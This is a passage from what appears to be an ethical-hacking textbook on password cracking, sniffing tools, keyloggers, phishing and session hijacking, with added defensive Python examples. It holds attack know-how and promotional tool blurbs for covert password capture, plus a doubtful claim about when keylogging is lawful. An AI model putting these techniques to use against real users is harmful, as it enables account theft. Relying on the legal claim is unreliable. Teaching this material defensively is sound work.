The most commonly used hash functions can be computed rapidly and
the attacker can test guesses repeatedly with different guesses until one
succeeds, meaning that the plaintext password has been recovered.
The term password cracking generally refers to recovery of one or more
plaintext passwords from hashed passwords, but there are also many
other ways of obtaining passwords illicitly. Without the hashed version of
a password, the attacker can still attempt access to the computer system
in question with guessed passwords. But well-designed systems limit the
number of failed access attempts and can alert administrators to trace
the source of the attack if that quota is exceeded. If the attacker has the
hashed password, he can work undetected, and if he has obtained
several hashed passwords, the chance of cracking at least one is quite
high.
Other ways to obtain passwords include social engineering, wiretapping,
keystroke logging, login spoofing, dumpster diving, phishing, shoulder
surfing, timing attack, acoustic cryptanalysis, using a Trojan Horse or
virus, identity management system attacks and compromising host
security. While those methods are not considered "password cracking"
they are very popular among criminals and remain very effective. They
are often considered as the main vulnerability in password
authentication systems.
Common methods for verifying users over a computer network often
expose the hashed password. For example, use of a hash-based
challenge-response authentication method for password verification may
provide a hashed password to a network eavesdropper, who can then
crack the password. A number of stronger cryptographic protocols exist
that do not expose hashed passwords during verification over a network,
either by protecting them in transmission using a high-grade key, or by
using a zero-knowledge password proof.
8.2. Attack Methods [54]
8.2.1. Weak encryption
If a system uses a poorly designed password hashing scheme to protect
stored passwords, an attacker can exploit any weaknesses to recover
even 'well-chosen' passwords. One example is the LM hash that Microsoft
Windows XP and earlier versions use by default to store user passwords of
less than 15 characters in length. LM hash converts the password into all
uppercase letters, then breaks the password into two 7-character fields
which are hashed separately—which allows each half to be attacked
individually.
Password encryption schemes that use stronger hash functions like
MD5, SHA-512, SHA-1, and RIPEMD-160 can still be vulnerable to
brute-force and pre-computation attacks. Such attacks do not depend on
reversing the hash function. Instead, they work by hashing a large
number of words or random permutations and comparing the result of
each guess to a user's stored password hash. Modern schemes such as
MD5-crypt and bcrypt use purposefully slow algorithms so that the
number of guesses that an attacker can make in a given period of time is
relatively low. Salting, described below, greatly increases the difficulty of
such pre-computation attacks, perhaps sufficiently to resist all attacks;
every instance of its use must be evaluated independently, however.
[54] Internet Security by Wikipedians
Because progress in analyzing existing cryptographic hash algorithms is
always possible, a hash which is effectively invulnerable today may
become vulnerable tomorrow. Both MD5 and SHA-1, long thought
secure, have been shown vulnerable to attacks more efficient than brute
force. For encryption algorithms the same has been true: DES has
been broken, and computers have become fast enough that its short key
(56 bits) is clearly and publicly insecure against even brute force attacks.
Passwords protected by these measures will become vulnerable to
attack, and passwords still in use will thereby be exposed.
8.2.2. Guessing
Passwords can sometimes be guessed by humans with knowledge of the
user's personal information. Examples of guessable passwords include:
Blank (none)
The words "password", "passcode", "admin" and their derivatives
A row of letters from the qwerty keyboard (qwerty itself, asdf, or
qwertyuiop)
The user's name or login name
The name of their significant other, a friend, relative or pet
Their birthplace or date of birth, or a friend's, or a relative's
Their automobile license plate number, or a friend's, or a relative's
Their office number, residence number or, most commonly, their
mobile number
A name of a celebrity they like
A simple modification of one of the preceding, such as suffixing a
digit, particularly 1, or reversing the order of the letters
A swear word
and so, extensively, on
Personal data about individuals are now available from various sources,
many on-line, and can often be obtained by someone using social
engineering techniques, such as posing as an opinion surveyor or a
security control checker. Attackers who know the user may have
information as well. For example, if a user chooses the password
"YaleLaw78" because he graduated from Yale Law School in 1978, a
disgruntled business partner might be able to guess the password.
8.2.3. Dictionary attacks [55]
Users often choose weak passwords. Examples of insecure choices
include the above list, plus single words found in dictionaries, given and
family names, any password that is too short (usually thought to be 6 or
7 characters or less), or any password meeting a too restrictive, and so
predictable, pattern, e.g. alternating vowels and consonants. Repeated
research over some 40 years has demonstrated that around 40% of user-
chosen passwords are readily guessable by sophisticated cracking
programs armed with dictionaries and, perhaps, the user's personal
information.
In one survey of MySpace passwords obtained by phishing, 3.8 percent of
those passwords were a single word findable in a dictionary, and another
12 percent were a word plus a final digit; two-thirds of the time that digit
was 1.
Some users neglect to change the default password that came with their
computer system account, and some administrators neglect to change
default account passwords provided by the operating system vendor or
hardware supplier. An infamous example is the use of Field Service as a
user name with Guest as the password. If not changed at system
configuration time, anyone familiar with such systems will have 'cracked'
an important password; such service accounts often have higher access
privileges than normal user accounts. Lists of default passwords are
available on the Internet. Gary McKinnon, accused by the United States
of perpetrating the "biggest military computer hack of all time", has
claimed that he was able to get into the military's networks simply by
using a Perl script that searched for blank passwords; in other words, his
report suggests that there were computers on these networks with no
passwords at all.
[55] rafayhackingarticles.net
Cracking programs exist which accept personal information about the
user being attacked and generate common variations for passwords
suggested by that information.
8.2.4. Brute force attack
A last resort is to try every possible password, known as a brute force
attack. In theory, if there is no limit to the number of attempts, a brute
force attack will always be successful since the rules for acceptable
passwords must be publicly known; but as the length of the password
increases, so does the number of possible passwords. This method is
unlikely to be practical unless the password is relatively short; however,
techniques using parallel processing can reduce the time to find the
password in inverse proportion to the number of compute devices (CPUs)
in use. Much depends on whether the prospective attacker has access to
the hash of the password as well as the hashing algorithm. If so, the
attack is called an offline attack; if not, it is called an online attack. An
offline attack is generally much easier, because testing a password is
reduced to a mathematical computation of the hash of the password to
be tried and comparison with the hash of the real password. In an online
attack the attacker has to try to authenticate himself with all the possible
passwords, and rules and delays can be imposed by the system and the
attempts can be logged.
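As an added example that is not part of the book, the following Python sketch shows the server-side limit on failed attempts that makes an online attack noisy: it replays constructed log lines (a hypothetical "timestamp account source result" format), raises an alert once an account collects too many failures inside a short window, and refuses further attempts on that account, while widely spaced attempts slip under the threshold and remain visible only in the log itself.

```python
"""Added example (not from the book): a failed-login limiter of the kind
that makes online password guessing noisy.  The log format (timestamp,
account, source address, outcome) and every line in it are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication log.
LOG = """\
2013-05-01T09:00:01 alice 10.0.0.5 OK
2013-05-01T09:01:10 bob 10.0.0.9 FAIL
2013-05-01T09:01:11 bob 10.0.0.9 FAIL
2013-05-01T09:01:12 bob 10.0.0.9 FAIL
2013-05-01T09:01:13 bob 10.0.0.9 FAIL
2013-05-01T09:01:14 bob 10.0.0.9 FAIL
2013-05-01T09:01:15 bob 10.0.0.9 OK
2013-05-01T09:30:00 carol 10.0.0.7 FAIL
2013-05-01T09:45:00 carol 10.0.0.7 FAIL
2013-05-01T10:20:00 carol 10.0.0.7 FAIL
"""

MAX_FAILURES = 5               # failures tolerated inside one window
WINDOW = timedelta(minutes=10)


def parse_log(text):
    """Turn the constructed log into (time, account, source, result) tuples."""
    events = []
    for line in text.splitlines():
        ts, account, source, result = line.split()
        events.append((datetime.fromisoformat(ts), account, source, result))
    return events


def apply_lockout(events, max_failures=MAX_FAILURES, window=WINDOW):
    """Replay events through a per-account limiter.

    Returns (alerts, refused): alerts are (account, source, time) raised when
    an account collects max_failures failures within window; refused are the
    attempts turned away while the account is locked, right password or not.
    """
    recent = defaultdict(list)   # account -> times of failures still in window
    locked_until = {}            # account -> time the lock expires
    alerts, refused = [], []
    for ts, account, source, result in events:
        if account in locked_until and ts < locked_until[account]:
            refused.append((account, ts))
            continue
        if result == "OK":
            recent[account].clear()      # a genuine login resets the counter
            continue
        # Drop failures that fell out of the sliding window, then add this one.
        recent[account] = [t for t in recent[account] if ts - t <= window] + [ts]
        if len(recent[account]) >= max_failures:
            alerts.append((account, source, ts))
            locked_until[account] = ts + window
            recent[account].clear()
    return alerts, refused


def demo():
    """Run the constructed log through the limiter."""
    return apply_lockout(parse_log(LOG))
```

carol's three attempts are 15 and 35 minutes apart, so they never accumulate inside the window; a slow campaign like that is only caught by reviewing the log, which is why the attempts are recorded at all.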
A common password length recommendation is eight or more randomly
chosen characters combining letters, numbers, and special characters.
This recommendation makes sense for systems using stronger password
hashing mechanisms such as md5-crypt and the Blowfish-based bcrypt,
but is inappropriate for many Microsoft Windows systems because they
store a legacy LAN Manager hash which splits the password into two
seven character halves. On these systems, an eight character password
is converted into a seven character password and a one character
password. For better security, LAN Manager Password storage should be
disabled if it will not break supported legacy systems. Systems which
limit passwords to numeric characters only, or upper case only, or
generally those which limit the range of possible password character
choices, also make brute force attacks easier. Using longer passwords in
these cases can compensate for the limited allowable character set. Of
course, even with an adequate range of character choice, users who limit
themselves to an obvious subset of the available characters (e.g., only
upper case alphabetic characters, or only digits) make brute force attacks
against their accounts much easier.
8.2.5. Pre-computation (Rainbow Tables)
In its most basic form, pre-computation involves hashing each word in
the dictionary or any search space of candidate passwords and storing
the word and its computed hash in a way that enables lookup on the list
of computed hashes. This way, when a new encrypted password is
obtained, password recovery is instantaneous. Pre-computation can be
very useful for a dictionary attack if salt is not used properly (which is
explained later), and the dramatic decrease in the cost of mass storage
has made it practical for fairly large dictionaries.
Advanced pre-computation methods exist that are even more effective. By
applying a time-memory tradeoff, a middle ground can be reached: a
search space of size N can be turned into an encrypted database of size
O(N^(2/3)) in which searching for an encrypted password takes time
O(N^(2/3)). The theory has recently been refined into a practical technique.
Another example cracks alphanumeric Windows LAN Manager Passwords
in a few seconds. This is much faster than brute force attacks on the
obsolete LAN Manager, which uses a particularly weak method of
hashing the password. Windows systems prior to Windows Vista/Server
2008 compute and store a LAN Manager hash by default for backwards
compatibility.
8.2.6. Salting
The benefits of pre-computation and memorization can be nullified by
randomizing the hashing process. This is known as salting. When the
user sets a password, a short, random string called the salt is suffixed to
the password before encrypting it; the salt is stored along with the
encrypted password so that it can be used during verification. Since the
salt is usually different for each user, the attacker can no longer
construct tables with a single encrypted version of each candidate
password. Early UNIX systems used a 12-bit salt. Attackers could still
build tables with common passwords encrypted with all 4096 possible
12-bit salts. However, if the salt is long enough, there are too many
possibilities and the attacker must repeat the encryption of every guess
for each user. Modern methods such as md5-crypt and bcrypt use salts
of 48 and 128 bits respectively.
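As an added example that is not part of the book, the Python below contrasts the two storage schemes of sections 8.2.5 and 8.2.6: with an unsalted fast hash, one precomputed table answers every user's hash with a lookup, while a per-user salt forces whoever audits (or attacks) the hashes to recompute every candidate for every user. sha256 stands in for any fast unsalted hash; the candidate list, user records and salts are constructed.

```python
"""Added example (not from the book): how a per-user salt defeats a
precomputed hash table.  sha256 stands in for a generic fast hash; the
candidate list, user records and salts are constructed for the demo."""
import hashlib
import os

# Constructed list of guessable candidates of the kind section 8.2.2 lists.
CANDIDATES = ["password", "qwerty", "admin", "letmein", "password1",
              "123456", "monkey", "welcome", "dragon", "YaleLaw78"]


def fast_hash(text: str) -> str:
    """A fast, unsalted hash: the setting in which pre-computation pays off."""
    return hashlib.sha256(text.encode()).hexdigest()


def salted_hash(salt: str, password: str) -> str:
    """Salt suffixed to the password before hashing, as section 8.2.6 describes."""
    return fast_hash(password + salt)


def build_table(candidates):
    """Pre-computation: hash every candidate once and index by hash.

    Returns (table, hash_operations).  The table is built once and then
    serves every unsalted hash ever captured."""
    table = {fast_hash(w): w for w in candidates}
    return table, len(candidates)


def lookup_unsalted(table, stored_hashes):
    """Instant recovery for unsalted hashes: one dict lookup per user, no hashing."""
    return {user: table.get(h) for user, h in stored_hashes.items()}


def audit_salted(candidates, stored):
    """With a per-user salt the table is useless: each candidate must be
    re-hashed with each user's salt.  Returns (found, hash_operations)."""
    found, ops = {}, 0
    for user, (salt, h) in stored.items():
        found[user] = None
        for w in candidates:
            ops += 1
            if salted_hash(salt, w) == h:
                found[user] = w
                break
    return found, ops


def demo():
    """Constructed user records: carol's password is not on the list."""
    plain = {"alice": "password1", "bob": "letmein", "carol": "Tr0ub4dor&3-horse"}

    # Scheme A: unsalted fast hash.  One table, built once, serves every user.
    unsalted = {u: fast_hash(p) for u, p in plain.items()}
    table, build_ops = build_table(CANDIDATES)
    found_a = lookup_unsalted(table, unsalted)

    # Scheme B: a random 64-bit salt per user, stored in clear beside the hash.
    salted = {}
    for u, p in plain.items():
        salt = os.urandom(8).hex()
        salted[u] = (salt, salted_hash(salt, p))
    found_b, ops_b = audit_salted(CANDIDATES, salted)
    return found_a, build_ops, found_b, ops_b
```

With three users the salted audit already costs almost twice the hash operations of the table build, and the gap grows linearly with the number of users; the 12-bit salt of early UNIX only multiplied the table by 4096, which is why the section calls for salts long enough that no table is feasible.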
8.2.7. Keyloggers [56]
Keystroke loggers are stealth software packages that are placed between
the keyboard hardware and the operating system, so that they can record
every keystroke. There are two types of keystroke loggers.
a) Software Keylogger
It sends the attacker e-mails listing the keys typed by the user, irrespective
of the memory size. But the disadvantage is that it can be detected by
anti-virus or malware-detection software. In a software keylogger, the
attacker usually puts in his e-mail id and sets a timer to receive e-mails
at regular intervals to see what the user has typed.
b) Hardware Keylogger [57]
For a hardware keylogger the advantage is that it cannot be detected by
any anti-virus or any other such software. Also, human attention does not
go to the machine every day, hence it cannot be detected easily. But the
disadvantage is installing the hardware keylogger device, as well as
removing it from the user's/victim's machine, plus its memory limitation.
[56] cyberarmy.in
[57] hackingduo.blogspot.com
These Keyloggers can be used to steal:
a. passwords
b. confidential information like tender pricing, business secrets etc.
c. communication
d. surveillance
e. getting into someone's privacy.
Authorized use of a keylogger is permitted only to an employer on an
employee's machine, in order to monitor whether the employee is working
in favor of the company or not.
8.3. Software used for Password Cracking
There are many password cracking software tools, but the most popular
are Cain and Abel, John the Ripper, Hydra, ElcomSoft and Lastbit. Many
litigation support software packages also include password cracking
functionality. Most of these packages employ a mixture of cracking
strategies, with brute force and dictionary attacks proving to be the most
productive.
Sniffers are used to capture traffic sent between two systems. Depending
on how the sniffer is used and the security measures in place, a hacker
can use a sniffer to discover usernames, passwords, and other
confidential information transmitted on the network.
Password Sniffer can listen on your LAN and enables network
administrators or parents to capture the passwords of any network user.
Currently, Password Sniffer can monitor and capture passwords sent over
FTP, POP3, HTTP, SMTP, Telnet, etc.
8.3.1.Password Sniffers
i. Cain & Abel -- Password Sniffer, Cracker and Brute-Forcing Tool
Cain & Abel is a password recovery tool for Microsoft Operating Systems.
It allows easy recovery of various kinds of passwords by sniffing the
network, cracking encrypted passwords using Dictionary, Brute-Force
and Cryptanalysis attacks, recording VoIP conversations, decoding
scrambled passwords, recovering wireless network keys, revealing
password boxes, uncovering cached passwords and analyzing routing
protocols. The program does not exploit any software vulnerabilities or
bugs that could not be fixed with little effort. It covers some security
aspects/weaknesses present in protocol standards, authentication
methods and caching mechanisms; its main purpose is the simplified
recovery of passwords and credentials from various sources; however, it
also ships some “non standard” utilities for Microsoft Windows users.
1. The Decoders tab allows you to decrypt protected documents,
dial-up passwords, and wireless passwords.
a) Decoders tab (Figure 8.1: Cain & Abel)
b) It shows the saved password when a particular option is selected in
the left pane.
2. The Network tab helps you view the browsers, the dial-in servers,
the SQL servers, time servers and other users in the network.
3. The Sniffer tab is where you can capture packets in transit and
crack the password.
4. In the Cracker tab you can decode LM hash and NT hash values by
password attack methods like Dictionary, Brute force and
Cryptanalysis attack.
5. The Configuration dialog enables you to modify the ports, HTTP
fields, trace routes and filters. [58]
[58] http://www.oxid.it/cain.html
ii. Ace Password Sniffer [59]
The new version provides candidates for the username or password of
HTTP POST submissions. Ace Password Sniffer can listen on your LAN
and enable network administrators or parents to capture the passwords
of any network user. Currently Ace Password Sniffer can monitor and
capture passwords sent over FTP, POP3, HTTP, SMTP, Telnet, etc. Ace
Password Sniffer works passively and doesn't generate any network
traffic; therefore, it is very hard to be detected by others. And you
needn't install any additional software on other PCs or workstations. If
your network is connected through a switch, you can run the sniffer on
the gateway or proxy server, which can see all network traffic. This
stealth-monitoring utility is useful to recover your network passwords,
for parents to receive the network passwords of children, and for server
administrators to monitor password abuse.
Features:
Efficient: you can see the passwords as soon as they appear on the LAN.
Support for various protocols: fully supports application protocols such
as FTP, SMTP, POP3, TELNET, etc. That means user names and
passwords used to send and receive e-mails, to log on to a web site, or
to log on to a server, can all be captured and saved.
Support for the HTTP protocol: supports HTTP, including proxy
passwords, basic HTTP authentication, and most passwords submitted
through HTML, whether they are encoded by MIME or base64.
Verifies whether the captured passwords are valid: it can tell whether
the passwords are right. You can even get the replies from the
server for the login. And it always keeps trying to get valid user
name and password pairs.
[59] ace-password-sniffer--including-processing-fee.effetech.fileflash.com/
8.4. Web-Based Password Cracking Techniques
8.4.1.List the Authentication Types
Web servers and web applications support multiple authentication types.
The most common is HTTP authentication. There are two types of HTTP
authentication: basic and digest. Basic authentication sends the
username and password in clear text, whereas digest authentication
hashes the credentials and uses a challenge-response model for
authentication.
In addition, web servers and web applications support NTLM, certificate-
based, token-based, and biometric authentication. NTLM authentication
is used between Internet Explorer and IIS web servers, making NTLM
more suitable for internal authentication on an intranet that uses
Microsoft operating systems. Windows 2000 and 2003 servers utilize
Kerberos authentication as a more secure option. Certificate-based
authentication uses an X.509 certificate for public/private key
technology. A token, such as SecurID, is a hardware device that displays
an authentication code for 60 seconds; a user uses this code to log in to
a network. Biometric authentication uses a physical characteristic such
as a fingerprint, eye iris, or handprint to authenticate the user.
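As an added example that is not part of the book, this Python builds the two HTTP authentication exchanges the section compares: a Basic header, which a sniffer turns back into the password with a single base64 decode, and a Digest response computed as in RFC 2617 (qop=auth), where only a hash crosses the wire but, as section 8.1 warned for hash-based challenge-response, a captured challenge and response still let a candidate password be tested offline. The username, realm, nonce and other values are constructed.

```python
"""Added example (not from the book): what an eavesdropper gets from HTTP
Basic versus Digest authentication.  Digest values follow RFC 2617 with
qop=auth; credentials, realm, nonce and cnonce are constructed."""
import base64
import hashlib


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def basic_header(username: str, password: str) -> str:
    """Basic: the credentials are only base64-encoded, not encrypted."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


def decode_basic(header: str):
    """What a sniffer does with a captured Basic header: one base64 decode."""
    token = header.split("Basic ", 1)[1]
    user, pw = base64.b64decode(token).decode().split(":", 1)
    return user, pw


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce,
                    qop="auth"):
    """Client side of Digest: the password itself never crosses the wire,
    only this hash built over the server's nonce and the request."""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")


def digest_matches(captured_response, password_guess, **challenge):
    """The server's check, and also the eavesdropper's problem: anyone who
    saw the challenge parameters and the response can test a guess offline.
    challenge carries username, realm, method, uri, nonce, nc and cnonce."""
    return digest_response(password=password_guess, **challenge) == captured_response


def demo():
    """Constructed exchange for user alice with password s3cret."""
    basic = basic_header("alice", "s3cret")
    seen_by_sniffer = decode_basic(basic)          # the password, verbatim

    challenge = dict(username="alice", realm="example-realm", method="GET",
                     uri="/private", nonce="0123456789abcdef",   # constructed
                     nc="00000001", cnonce="f00dcafe")            # constructed
    response = digest_response(password="s3cret", **challenge)
    right = digest_matches(response, "s3cret", **challenge)
    wrong = digest_matches(response, "password", **challenge)
    return seen_by_sniffer, response, right, wrong
```

The nonce ties the response to one request, so a sniffer cannot replay it, but the hash is still a fast MD5 over a guessable password: the stronger protocols the section names later (Kerberos, tokens) avoid handing the eavesdropper anything to guess against.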
8.4.2.Hacking Tool
i. Webcracker [60] is a tool that uses a word list to attempt to log on to
a web server. It looks for the “HTTP 302 object moved” response to
make guesses on the password. From this response the tool can
determine the authentication type in use and attempt to log on to
the system.
8.4.3. Password-Cracking Countermeasures
The best password-cracking countermeasure is to implement strong
passwords that are at least eight characters long and that include
alphanumeric characters. Usernames and passwords should be different,
because many usernames are transmitted in clear text. Complex
passwords that require uppercase, lowercase, and numbers or special
characters are harder to crack. You should also implement a strong
authentication mechanism such as Kerberos or tokens to protect
passwords in transit.
[60] http://noorasec.com/books/CEH2010V6.pdf
8.4.4. Web Application Countermeasures
Countermeasures exist for common web application vulnerabilities.
Following are countermeasures for each of the web application
vulnerabilities listed in the previous section:
a. Cross-site scripting: Validate cookies, query strings, form
fields, and hidden fields.
b. SQL injection: Validate user variables.
c. Command injection: Use language-specific libraries for the
programming language.
d. Cookie poisoning and snooping: Don’t store passwords in a
cookie. Implement cookie timeouts, and authenticate
cookies.
e. Buffer overflow: Validate user input length, and perform
bounds checking.
f. Authentication hijacking: Use SSL to encrypt traffic.
g. Directory traversal / Unicode: Define access rights to
private folders on the web server. Apply patches and
hotfixes.
CHAPTER 9
EMAIL ACCOUNT HACKING AND TRACING
Objective
9.1 Introduction of E-Mail Hacking
9.2 Explanation of Email headers
9.3 Trace an Email sender
9.1. Introduction of Hacking Email Account
9.1.1. How to Hack Email [61]
Email hacking is illegal access to an email account or email
correspondence. Email on the internet is now commonly sent by
the Simple Mail Transfer Protocol (SMTP). This does not encrypt the text
of emails and so intercepted mail can be read easily unless the user adds
their own encryption. The identity of the sender or addressee of an email
is not authenticated and this provides opportunities for abuse such
as spoofing.
[61] http://ethicalhackerszone.blogspot.in/2012/07/email-hacking.html
Email Spoofing: Email spoofing is a technique used by hackers to
fraudulently send email messages in which the sender address and other
parts of the email header are altered to appear as though the email
originated from a source other than its actual source. Hackers use this
method to disguise the actual email address from which phishing and
spam messages are sent and often use email spoofing in conjunction
with Web page spoofing to trick users into providing personal and
confidential information.
Software is usually used to collect or generate the email addresses that
are spoofed. Hackers may create a virus that examines the contact
information on an infected computer. That information is collected and
sent to the hacker, who then uses another piece of software, a mass email
program, to send out bogus emails using the addresses collected.
Alternatively, hackers may use software that generates random email
addresses to disguise the actual origin of the message being sent.
Types of email hacking:
1. Phishing
2. RATs (Remote Administration Tools)
3. Key logging
4. Social Engineering (technique used by an attacker to answer the
security question)
5. Side jacking (Session Hijacking)
6. From the mail server
1. PHISHING
Phishing is an e-mail fraud method in which the hacker sends out
legitimate-looking email in an attempt to gather personal and
financial information from recipients. Typically, the messages appear
to come from well-known and trustworthy Web sites. Web sites that
are frequently spoofed by phishers include PayPal, eBay, MSN, Yahoo,
Best Buy, and America Online. A phishing expedition, like the fishing
expedition it's named for, is a speculative venture: the phisher puts out
the lure hoping to fool at least a few of the prey that encounter the
bait.
Techniques used within phishing emails:
1. Official-looking and official-sounding emails
2. Copies of legitimate corporate emails with minor URL changes
3. HTML-based email used to confuse target URL information
4. Standard virus/worm attachments to emails
5. An excess of anti-spam-detection inclusions
6. Crafting of “personalized” or unique email messages
7. Fake postings to popular message boards and mailing lists
8. Use of fake “Mail From:” addresses and open mail relays for
disguising the source of
An Example of a Fake Gmail Home Page:
Things to keep in mind to avoid phishing attacks:
1. Most fake communications convey a sense of urgency by
threatening discontinued service.
2. Many fraudulent emails contain misspellings, incorrect grammar,
and poor punctuation.
3. Links within the fake email may appear valid but deliver you to a
fraudulent site.
4. Phishing emails often use generic salutations like "Dear
Customer" or "Dear account holder" instead of your name, and the
address from which the email was sent is often not one from the
company it claims to be.
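Point 3 can be checked mechanically. As an added example that is not part of the book, the Python below parses a constructed HTML message and flags every link whose visible text names one host while its href points at another, which is the usual shape of a link that "appears valid but delivers you to a fraudulent site".

```python
"""Added example (not from the book): flag links whose displayed host
differs from the host they point to.  The HTML body is constructed in the
style of a spoofed bank notice; the domain names are placeholders."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed message body.  The first link shows the bank's address but
# points elsewhere; the second is consistent.
SAMPLE = """
<p>Dear Customer, your account will be suspended within 24 hours.</p>
<p>Please visit <a href="http://secure-login.example-phish.net/verify">
https://www.example-bank.com/login</a> to confirm your details.</p>
<p>Help: <a href="https://www.example-bank.com/help">www.example-bank.com/help</a></p>
"""


class LinkCollector(HTMLParser):
    """Collects (href, visible text) for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href", "")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:          # inside an <a> ... </a>
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(text: str) -> str:
    """Host named by a URL or by bare link text such as 'www.example.com/x';
    returns '' when the text does not look like an address at all."""
    if " " in text or "." not in text:
        return ""
    if "://" not in text:
        text = "http://" + text
    return (urlparse(text).hostname or "").lower()


def suspicious_links(html: str):
    """Return (visible_text, href) for links whose shown host and target host differ."""
    parser = LinkCollector()
    parser.feed(html)
    flagged = []
    for href, text in parser.links:
        shown = host_of(text)
        if shown and shown != host_of(href):
            flagged.append((text, href))
    return flagged
```

Link text such as "click here" names no host, so it is not flagged; such links can only be judged by looking at the target host itself.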
An Example Of a Fake Email
2. RATs (Remote Administration Tools)
RAT is short for Remote Administration Tool. It is mostly used for
malicious purposes, such as controlling PCs, stealing a victim's data, and
deleting or editing files. Someone can only be infected by being sent a
file called the Server, which they need to click.
3. KEY LOGGING
Keystroke logging (more often called keylogging or "keyloggers") is the
action of tracking (or logging) the keys struck on a keyboard, typically in
a secret manner so that the person using the keyboard is unaware that
their actions are being monitored. There are numerous key logging
methods, ranging from hardware and software-based approaches to
electromagnetic and acoustic analysis.
Types of Keyloggers:
1. Software-based Keyloggers
2. Hardware-based Keyloggers
1. Software-based Keyloggers
Software based Keyloggers record each and every keystroke typed with
the help of Software. These keystrokes are stored in a log file.
An example of Keystroke log file
2. Hardware-based Keyloggers
Hardware-based keyloggers record each and every keystroke typed with
the help of a hardware device.
An example of a typical hardware keylogger
An example of how hardware keyloggers are connected to the system
Countermeasures
Use of a virtual keyboard or on-screen keyboard can be an effective
method to avoid keyloggers. But it will not work under certain
circumstances.
4. SOCIAL ENGINEERING (Tricking People Into Answering Security Questions)
Social engineering is the human side of breaking into a corporate
network. A company with authentication processes, firewalls, VPNs and
network monitoring software is still wide open to attack if an employee
unwittingly gives away key information in an email, answers questions
over the phone from someone they do not know, or fails to ask the right
questions.
Forms of Social Engineering:
Social engineering is not limited to phone calls; many organizations have
reported cases involving visitors impersonating a telephone repair
technician requesting access to a wiring closet or a new member of the IT
department needing help accessing a file.
People, for the most part, look at social engineering as an attack on their
intelligence and no one wants to be considered “ignorant” enough to have
been a victim. It’s important to remember that no matter who you are,
you are susceptible to a social engineering attack.
If you suspect social engineering – don’t be afraid to ask questions
and/or notify your IT department. If a caller requests information that is
technical in nature, please refer them to your IT department.
How to prevent social engineering
Never give out:
1. Usernames; administrators already know them or can find them out
themselves
2. Passwords; an administrator may ask you to type it into the computer
yourself, but should never ask you to tell it to anyone
3. ID numbers
4. PIN numbers
5. Server names
6. System information
5. SIDEJACKING (Session Hijacking)
Session hijacking is an attack in which the attacker obtains a valid
client's session identifier and uses it to take over that session. HTTP
is a stateless protocol, so when a user logs into a website the web
server creates a session for that user; the session holds the user's
state on the server so that the username and password are not needed at
every page request. The server issues a unique session identifier
(usually in a cookie) and the browser sends it back with every request;
this identifier is all the server uses to tie a request to the logged-in
user, so whoever holds it is that user as far as the server is concerned.
Sidejacking is the form of session hijacking in which the attacker sniffs
the session cookie from unencrypted network traffic, for example on an
open Wi-Fi network. After obtaining the identifier, the attacker sets it
in his or her own browser; every request then carries the same
identifier as the genuine user's, so the attacker is logged in as that
user and has access to all of that user's information and privileges on
that website. Note that session hijacking does not reveal the user's
password; the attacker gets the session, not the credentials.
Countermeasures
1. Use secure connections (HTTPS, i.e. SSL/TLS) for the whole site, not
just the login page, since an encrypted connection keeps the identifier
from being sniffed in transit. Encryption alone is not enough: a session
cookie set without the Secure flag is still sent over plain HTTP if the
browser is lured to an http:// URL on the same site, and an identifier
stolen by other means (cross-site scripting, malware on the client) works
over HTTPS just as well.
2. Regenerate the user's session identifier often, and always at login
and on any change of privilege. Even if an attacker manages to steal an
identifier, it becomes useless once it is regenerated.
3. Bind the session to the client, for example by checking that a
session identifier is presented from the same IP address it was issued
to. This has limitations: users behind proxies or on mobile networks
change address legitimately, and an attacker on the same network (the
classic sidejacking case) often shares the victim's public address.
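The three countermeasures as an added Python example (not code from this book): an in-memory session store that issues random identifiers, rotates the identifier at login so a pre-login or sniffed value stops working, and refuses an identifier presented from an address other than the one it was issued to, together with the Set-Cookie line that keeps the identifier off plain HTTP. The store, its method names, the cookie name SESSIONID and the client addresses are assumptions made for the example.

```python
"""Session handling that applies the three countermeasures above:
unguessable identifiers, regeneration at login, and binding the session
to the client address. Example code, not from the original text; the
store, its API and the cookie name are assumptions for illustration."""
import secrets
import time

SESSION_COOKIE = "SESSIONID"   # cookie name assumed for the example


class SessionStore:
    """In-memory session table; a real site keeps this server-side."""

    def __init__(self, idle_timeout=900):
        self._sessions = {}        # sid -> {"user", "ip", "last_seen"}
        self.idle_timeout = idle_timeout

    @staticmethod
    def _new_id():
        # 32 bytes from the OS CSPRNG: an attacker cannot guess or
        # enumerate it, unlike a counter or a timestamp-derived value.
        return secrets.token_urlsafe(32)

    def create(self, ip, user="anonymous", now=None):
        """Issue a session bound to the client address it was issued to."""
        sid = self._new_id()
        self._sessions[sid] = {"user": user, "ip": ip,
                               "last_seen": now if now is not None else time.time()}
        return sid

    def lookup(self, sid, ip, now=None):
        """Return the user for sid, or None if the identifier is unknown,
        idle for too long, or presented from another address
        (countermeasure 3: a sidejacker on another network fails here;
        one behind the victim's own NAT address may still pass)."""
        now = now if now is not None else time.time()
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        if now - rec["last_seen"] > self.idle_timeout:
            del self._sessions[sid]         # stale: force a fresh login
            return None
        if rec["ip"] != ip:
            return None
        rec["last_seen"] = now
        return rec["user"]

    def login(self, old_sid, ip, user, now=None):
        """Successful authentication: destroy the pre-login identifier and
        issue a new one (countermeasure 2). Anything captured before this
        point, whether sniffed or planted by session fixation, is dead."""
        self._sessions.pop(old_sid, None)
        return self.create(ip, user=user, now=now)

    def logout(self, sid):
        self._sessions.pop(sid, None)


def set_cookie_header(sid, max_age=None):
    """Set-Cookie value for the identifier. Secure keeps it off plain
    HTTP (the channel sidejacking sniffs), HttpOnly keeps it out of reach
    of page scripts, SameSite=Lax stops most cross-site replay."""
    attrs = [f"{SESSION_COOKIE}={sid}", "Path=/", "Secure", "HttpOnly",
             "SameSite=Lax"]
    if max_age is not None:
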